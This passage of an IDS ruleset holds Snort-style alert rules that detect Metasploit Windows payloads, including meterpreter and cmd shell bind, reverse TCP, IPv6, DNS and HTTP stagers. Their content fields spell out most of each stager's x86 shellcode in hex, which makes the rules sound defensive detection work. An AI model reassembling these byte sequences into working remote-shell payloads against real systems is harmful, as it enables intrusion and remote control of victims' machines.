68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 66 68 00 |"; content:"| 66 53 89 e1 6a 10 51 57 66 b9 80 3b ff d6 53 57 66 b9 75 49 ff d6 54 54 54 57 66 b9 32 4c ff d6 97 50 66 b9 33 ce ff d6 89 e1 50 b4 0c 50 51 57 51 66 b9 c0 38 ff e6 |"; sid:1000153; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupmeterpreter/bind_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 31 db 53 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 c2 db 37 67 ff d5 53 57 68 b7 e9 38 ff ff d5 53 53 57 68 74 ec 3b e1 ff d5 57 97 68 75 6e 4d 61 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000154; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupmeterpreter/find_tag"; flow:established; content:"| fc 33 ff 64 8b 47 30 8b 40 0c 8b 58 1c 8b 1b 8b 73 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6b 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 8b 5c 29 3c 03 dd 03 6c 29 24 57 66 47 8b f4 56 68 7f 66 04 40 57 ff d5 ad 85 c0 74 ee 99 52 b6 0c 52 56 57 ff d3 ad 3d |"; content:"| 75 dd ff e6 |"; sid:1000155; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupmeterpreter/reverse_ipv6_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 04 02 00 00 29 c4 48 48 54 50 68 29 80 6b 00 ff d5 50 50 50 6a 06 40 50 6a 17 68 ea 0f df e0 ff d5 89 c7 6a 1c e8 1c 00 00 00 17 00 00 |"; content:"| 00 00 00 00 fe 80 00 00 00 00 00 00 00 00 5e fe |"; content:"| 00 00 00 00 57 68 99 a5 74 61 ff d5 89 e6 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000156; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupmeterpreter/reverse_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 68 |"; content:"| 66 53 89 e3 6a 10 53 57 66 b9 57 05 ff d6 50 b4 0c 50 53 57 53 66 b9 c0 38 ff e6 |"; sid:1000157; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupmeterpreter/reverse_ord_tcp"; flow:established; content:"| fc 31 db 64 8b 43 30 8b 40 0c 8b 50 1c 8b 12 8b 72 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6a 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 01 e9 8b 41 58 01 e8 8b 71 3c 01 ee 03 69 0c 53 6a 01 6a 02 ff d0 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e1 53 b7 0c 53 51 57 51 6a 10 51 57 56 ff e5 |"; sid:1000158; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupmeterpreter/reverse_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 6a 05 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 0c ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000159; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupmeterpreter/reverse_tcp_allports"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 12 31 c0 66 8b 46 02 86 e0 66 40 86 e0 66 89 46 02 eb df 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000160; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupmeterpreter/reverse_tcp_dns"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 eb 2f 68 a9 28 34 80 ff d5 8b 40 1c 6a 05 50 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 51 ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 e8 cc ff ff ff |"; content:"| 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 |"; content:"| 00 56 6a 00 68 |"; content:"| a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000161; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/bind_ipv6_tcp"; flow:established; content:"| fc e8 56 00 00 00 53 55 56 57 8b 6c 24 18 8b 45 3c 8b 54 05 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 32 49 8b 34 8b 01 ee 31 ff fc 31 c0 ac 38 e0 74 07 c1 cf 0d 01 c7 eb f2 3b 7c 24 14 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 eb 02 31 c0 5f 5e 5d 5b c2 08 00 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 6a 18 59 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 81 ff 5b bc 4a 6a 8b 5a 10 8b 12 75 db 5e 53 68 8e 4e 0e ec ff d6 89 c7 53 68 54 ca af 91 ff d6 81 ec 00 01 00 00 50 57 56 53 89 e5 e8 27 00 00 00 90 01 00 00 b6 19 18 e7 ec f2 55 c0 e5 49 86 49 a4 1a 70 c7 a4 ad 2e e9 d9 09 f5 ad cb ed fc 3b 57 53 32 5f 33 32 00 5b 8d 4b 20 51 ff d7 89 df 89 c3 8d 75 14 6a 07 59 51 53 ff 34 8f ff 55 04 59 89 04 8e e2 f2 2b 27 54 68 02 02 00 00 ff 55 30 31 c0 50 50 50 6a 06 6a 01 6a 17 ff 55 2c 89 c7 6a 0a 89 e0 6a 04 50 6a 17 6a 29 57 ff 55 1c 58 68 00 00 00 00 31 c9 51 51 51 51 51 68 17 00 00 |"; content:"| 89 e1 6a 1c 51 57 ff 55 24 31 db 53 57 ff 55 28 53 53 57 ff 55 20 89 c7 6a 40 |"; content:"| 5e 56 c1 e6 06 56 c1 e6 08 56 6a 00 ff 55 0c 89 c3 6a 00 68 00 10 00 00 53 57 ff 55 18 ff d3 |"; sid:1000162; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/bind_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 66 68 00 |"; content:"| 66 53 89 e1 6a 10 51 57 66 b9 80 3b ff d6 53 57 66 b9 75 49 ff d6 54 54 54 57 66 b9 32 4c ff d6 97 50 66 b9 33 ce ff d6 89 e1 50 b4 0c 50 51 57 51 66 b9 c0 38 ff e6 |"; sid:1000163; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/bind_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 31 db 53 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 c2 db 37 67 ff d5 53 57 68 b7 e9 38 ff ff d5 53 53 57 68 74 ec 3b e1 ff d5 57 97 68 75 6e 4d 61 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000164; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/find_tag"; flow:established; content:"| fc 33 ff 64 8b 47 30 8b 40 0c 8b 58 1c 8b 1b 8b 73 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6b 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 8b 5c 29 3c 03 dd 03 6c 29 24 57 66 47 8b f4 56 68 7f 66 04 40 57 ff d5 ad 85 c0 74 ee 99 52 b6 0c 52 56 57 ff d3 ad 3d |"; content:"| 75 dd ff e6 |"; sid:1000165; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/reverse_http"; flow:established; content:"| fc e8 ac 00 00 00 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 5c 5a 6f 6e 65 73 5c 33 00 31 30 30 34 31 32 30 30 31 32 30 31 31 30 30 31 43 3a 5c 70 72 6f 67 72 61 7e 31 5c 69 6e 74 65 72 6e 7e 31 5c 69 65 78 70 6c 6f 72 65 20 2d 6e 65 77 20 68 74 74 70 3a 2f 2f |"; content:"| 3a 38 30 30 30 2f |"; content:"| 00 e8 4e 00 00 00 60 8b 6c 24 24 8b 45 3c 8b 7c 05 78 01 ef 8b 4f 18 8b 5f 20 01 eb e3 32 49 8b 34 8b 01 ee 31 c0 99 ac 84 c0 74 07 c1 ca 0d 01 c2 eb f4 3b 54 24 28 75 e3 8b 5f 24 01 eb 66 8b 0c 4b 8b 5f 1c 01 eb 8b 04 8b 01 e8 89 44 24 1c 61 c2 08 00 5f 5b 31 d2 64 8b 42 30 85 c0 78 0c 8b 40 0c 8b 70 1c ad 8b 40 08 eb 09 8b 40 34 83 c0 7c 8b 40 3c 89 e5 68 7e d8 e2 73 50 68 72 fe b3 16 50 68 8e 4e 0e ec 50 ff d7 96 ff d7 89 45 00 ff d7 89 45 04 52 68 70 69 33 32 |"; content:"| 68 61 64 76 61 54 ff d6 68 a9 2b 92 02 50 68 dd 9a 1c 2d 50 ff d7 89 45 08 ff d7 97 87 f3 54 56 68 01 00 00 |"; content:"| ff d7 5b 83 c6 44 50 89 e7 80 3e 43 74 1b 50 ad 50 89 e0 6a 04 57 6a 04 6a 00 50 53 ff 55 08 eb e8 8a 0d 30 00 fe 7f 88 0e 6a 54 59 29 cc 89 e7 57 f3 aa 5f c6 07 44 fe 47 2c fe 47 2d 68 75 6c 74 00 68 44 65 66 61 68 74 61 30 5c 68 57 69 6e 53 89 67 08 8d 5f 44 53 57 50 50 6a 10 50 50 50 56 50 ff 55 00 ff 55 04 |"; sid:1000166; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/reverse_ipv6_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 04 02 00 00 29 c4 48 48 54 50 68 29 80 6b 00 ff d5 50 50 50 6a 06 40 50 6a 17 68 ea 0f df e0 ff d5 89 c7 6a 1c e8 1c 00 00 00 17 00 00 |"; content:"| 00 00 00 00 fe 80 00 00 00 00 00 00 00 00 5e fe |"; content:"| 00 00 00 00 57 68 99 a5 74 61 ff d5 89 e6 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000167; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/reverse_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 68 |"; content:"| 66 53 89 e3 6a 10 53 57 66 b9 57 05 ff d6 50 b4 0c 50 53 57 53 66 b9 c0 38 ff e6 |"; sid:1000168; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/reverse_ord_tcp"; flow:established; content:"| fc 31 db 64 8b 43 30 8b 40 0c 8b 50 1c 8b 12 8b 72 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6a 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 01 e9 8b 41 58 01 e8 8b 71 3c 01 ee 03 69 0c 53 6a 01 6a 02 ff d0 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e1 53 b7 0c 53 51 57 51 6a 10 51 57 56 ff e5 |"; sid:1000169; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/reverse_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 6a 05 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 0c ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000170; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/reverse_tcp_allports"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 12 31 c0 66 8b 46 02 86 e0 66 40 86 e0 66 89 46 02 eb df 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000171; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell/reverse_tcp_dns"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 eb 2f 68 a9 28 34 80 ff d5 8b 40 1c 6a 05 50 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 51 ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 e8 cc ff ff ff |"; content:"| 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 |"; content:"| 00 56 6a 00 68 |"; content:"| a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000172; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell_bind_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 89 c7 31 db 53 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 c2 db 37 67 ff d5 53 57 68 b7 e9 38 ff ff d5 53 53 57 68 74 ec 3b e1 ff d5 57 89 c7 68 75 6e 4d 61 ff d5 68 63 6d 64 00 89 e3 57 57 57 31 f6 6a 12 59 56 e2 fd 66 c7 44 24 3c 01 01 8d 44 24 10 c6 00 44 54 50 56 56 56 46 56 4e 56 56 53 56 68 79 cc 3f 86 ff d5 89 e0 4e 56 46 ff 30 68 08 87 1d 60 ff d5 bb f0 b5 a2 56 68 a6 95 bd 9d ff d5 3c 06 7c 0a 80 fb e0 75 05 bb 47 |"; content:"| 13 72 6f 6a 00 53 ff d5 |"; sid:1000173; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/shell_bind_tcp_xpfw"; flow:established; content:"| e8 56 00 00 00 53 55 56 57 8b 6c 24 18 8b 45 3c 8b 54 05 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 32 49 8b 34 8b 01 ee 31 ff fc 31 c0 ac 38 e0 74 07 c1 cf 0d 01 c7 eb f2 3b 7c 24 14 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 eb 02 31 c0 5f 5e 5d 5b c2 08 00 5e 6a 30 59 64 8b 19 8b 5b 0c 8b 5b 1c 8b 1b 8b 5b 08 53 68 8e 4e 0e ec ff d6 89 c7 81 ec 00 01 00 00 57 56 53 89 e5 e8 27 00 00 00 90 01 00 00 b6 19 18 e7 a4 19 70 e9 e5 49 86 49 a4 1a 70 c7 a4 ad 2e e9 d9 09 f5 ad cb ed fc 3b 57 53 32 5f 33 32 00 5b 8d 4b 20 51 ff d7 89 df 89 c3 8d 75 14 6a 07 59 51 53 ff 34 8f ff 55 04 59 89 04 8e e2 f2 2b 27 54 ff 37 ff 55 30 31 c0 50 50 50 50 40 50 40 50 ff 55 2c 89 c7 89 7d 0c e8 06 00 00 00 4f 4c 45 33 32 00 ff 55 08 89 c6 56 68 1b 06 c8 0d ff 55 04 6a 02 6a 00 ff d0 56 68 80 c8 26 6e ff 55 04 89 c7 e8 20 00 00 00 f5 8a 89 f7 c4 ca 32 46 a2 ec da 06 e5 11 1a f2 42 e9 4c 30 39 6e d8 40 94 3a b9 13 c4 0c 9c d4 58 50 8d 75 ec 56 50 6a 01 6a 00 83 c0 10 50 ff d7 8d 4d e0 51 